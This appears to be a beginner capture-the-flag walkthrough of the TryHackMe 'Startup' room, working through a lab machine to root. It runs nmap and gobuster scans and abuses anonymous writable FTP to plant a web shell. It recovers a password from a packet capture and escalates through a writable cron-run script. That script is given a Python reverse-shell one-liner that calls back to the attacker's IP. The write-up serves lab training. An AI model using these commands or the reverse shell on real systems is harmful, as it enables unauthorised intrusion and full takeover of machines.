Contents

THM: Startup

Hello, everyone! In this article, I’ll walk you through a TryHackMe room called Startup. This room is designed for beginners, testing your skills in web exploitation, FTP access, remote code execution, and, ultimately, gaining root access through a basic cronjob privilege escalation. Get ready to tackle this beginner-friendly challenge and learn as you progress. Let’s dive in!

Reconnaissence

Scanning

Nmap scan

Let’s start with an aggresive -A Nmap scan on all ports -p-.

ryuk@kali:~$ nmap -A -p- -T4 -oA nmap/aggressive-scan-all-ports 10.10.179.133

scan report:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-25 15:07 IST
Stats: 0:07:34 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.80% done; ETC: 15:22 (0:07:38 remaining)
Nmap scan report for 10.10.179.133
Host is up (0.21s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
21/tcp    open     ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.8.79.167
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx    2 65534    65534        4096 Feb 25 09:53 ftp [NSE: writeable]
| -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
|_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b9a60b841d2201a401304843612bab94 (RSA)
|   256 ec13258c182036e6ce910e1626eba2be (ECDSA)
|_  256 a2ff2a7281aaa29f55a4dc9223e6b43f (ED25519)
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Maintenance
|_http-server-header: Apache/2.4.18 (Ubuntu)
46699/tcp filtered unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1066.65 seconds

Enumeration

The Nmap scan has been completed, and I found 4 open ports. Now, let’s enumerate the open ports one by one.

PORT: 21 FTP

On port 21, FTP is running and allows anonymous login. Which means I can log in using anonymous:anonymous

version: vsftpd 3.0.3

Anonymous login available

| drwxrwxrwx    2 65534    65534        4096 Feb 25 09:53 ftp [NSE: writeable]
| -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
|_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt

Note: directory ftp is writable

The file permissions of the FTP directory allow everyone to write data.

/posts/thm/startup/images/Pasted%20image%2020230225210906.png

ryuk@kali:~$ ftp 10.10.179.133
PORT: 22 SSH

Version: OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

SSH is running but not vulnerable, it could help to log in if i get the credentails.

PORT: 80 HTTP

Website URL: http://10.10.179.133/

When I visit the website, it is showing a maintenance page. Nothing interesting found.

200 Maintenance page.

/posts/thm/startup/images/Pasted%20image%2020230225210206.png
Maintenance page

Gobuster

As usual, I ran Gobuster to fuzz web directories and found two directories.

ryuk@kali:~$ gobuster dir -u http://10.10.179.133/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -o web/80-http/gobuster.txt

/posts/thm/startup/images/Pasted%20image%2020230225211834.png
gobuster results

/files            301
/server-status    403

/posts/thm/startup/images/Pasted%20image%2020230225212059.png

FTP files are accessible from /files. I can upload a shell using FTP and execute it by visiting this endpoint.

Exploitation

Shell as www

Logged in with ftp and upload simple web shell in ftp directory.

/posts/thm/startup/images/Pasted%20image%2020230225212416.png

/posts/thm/startup/images/Pasted%20image%2020230225212454.png

Webshell is working

/posts/thm/startup/images/Pasted%20image%2020230225212603.png

Time to upload a stable reverse shell.

/posts/thm/startup/images/Pasted%20image%2020230225212951.png

Initially, the shell we get is a non-interactive shell with limited features. To make it an interactive shell, you can use python’s pty module:

python -c 'import pty; pty.spawn("/bin/bash")'

There are unusual directories and files which should not be in root

incidents
vagrant
recipe.txt

recipe.txt

Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

Unable to access user’s home directory

/posts/thm/startup/images/Pasted%20image%2020230225214502.png

Shell as lennie

There is some more directories in root let’s check them out.

/posts/thm/startup/images/Pasted%20image%2020230225213131.png

Found suspicious.pcapng file in incidents directory.

open file with wireshark and after some analysis, found the password for user lennie in a reverse shell session.

we can ssh or switch user to lennie using this password.

/posts/thm/startup/images/Pasted%20image%2020230225214928.png

Shell as root

There is one more intresting directory named scripts, In which a file planner.sh is running with root privileges maybe some cronjob is running this file. You can confirm this by checking the timestamp of the file “startup_list.txt,” which is updated by the “planner.sh” script every minute.

/posts/thm/startup/images/Pasted%20image%2020230225215205.png

File: /etc/print.sh

/posts/thm/startup/images/Pasted%20image%2020230225215611.png

Our user lennie can edit this file /etc/print.sh

We can either read root.txt or spawn root shell.

echo "cat /root/root.txt >/tmp/root.txt">>/etc/print.sh

/posts/thm/startup/images/Pasted%20image%2020230225164959.png

This will create a python reverse shell which i can connect.

echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.79.167\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"bash\")'">>/etc/print.sh

/posts/thm/startup/images/Pasted%20image%2020230225222808.png

Thank you for reading!